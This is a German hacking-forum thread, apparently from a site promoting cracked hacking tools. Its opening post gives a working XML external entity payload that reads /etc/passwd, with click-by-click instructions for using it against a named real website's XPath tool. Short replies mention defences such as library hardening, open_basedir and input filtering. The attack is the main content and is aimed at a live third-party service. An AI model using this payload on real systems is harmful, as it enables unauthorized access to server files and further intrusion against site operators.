Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

utilities-online.info - xml external entity attack

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

Please Login HERE or Register HERE to see this link!




Im Feld "XML" folgendes eingeben:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Im Feld XPath Expression:
/

Dann auf "Evalutate XPath" klicken.
Unten im grünen Feld erscheint dann die Ausgabe der angegebenen Datei.
  • Ch!ller gefällt das

#2
Xenos88

Xenos88

    Hacker

  • Premium Member
  • Likes
    67
  • 151 Beiträge
  • 184 Bedankt
wie kann man sich vor solcher Attacke schützen ?

#3
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    211
  • 219 Beiträge
  • 184 Bedankt
in dem man seine library dagegen absichert.

open_basedir wär vielleicht auch mal hilfreich
  • ¥akuza112 gefällt das

#4
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Hier ein Link mit mehr Informationen zu der Attacke:

Please Login HERE or Register HERE to see this link!



Sie kann gegen mehrere Skriptsprachen wie php, jsp oder asp angewandt werden.
Je nach Skriptsprache hat man verschiedene Möglichkeiten die Attacke einzusetzen. Auch SQL-Injection und OS-Command-Injection ist teilweise möglich.
Um sich zu schützen muss man auf jeden Fall die Eingaben der User prüfen und filtern.
  • pdr0 gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 34 user(s)


    , ¥akuza112, Ac4nth, AdlerRhy, Blower, Born2Hack, Ch!ller, chimchoca7, Cranky, crano, Cube, curlz, FalkE, Framerater, gutzuu, hikhack7, Imperial, InternetFreak, kadama, lolorollo, maximaxi, paulaner, pdr0, Platin, ProHex, Silasge, sivan1, smc2014, Smokyjoe, Soek, Xenio, Xenos88, xrahitel, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.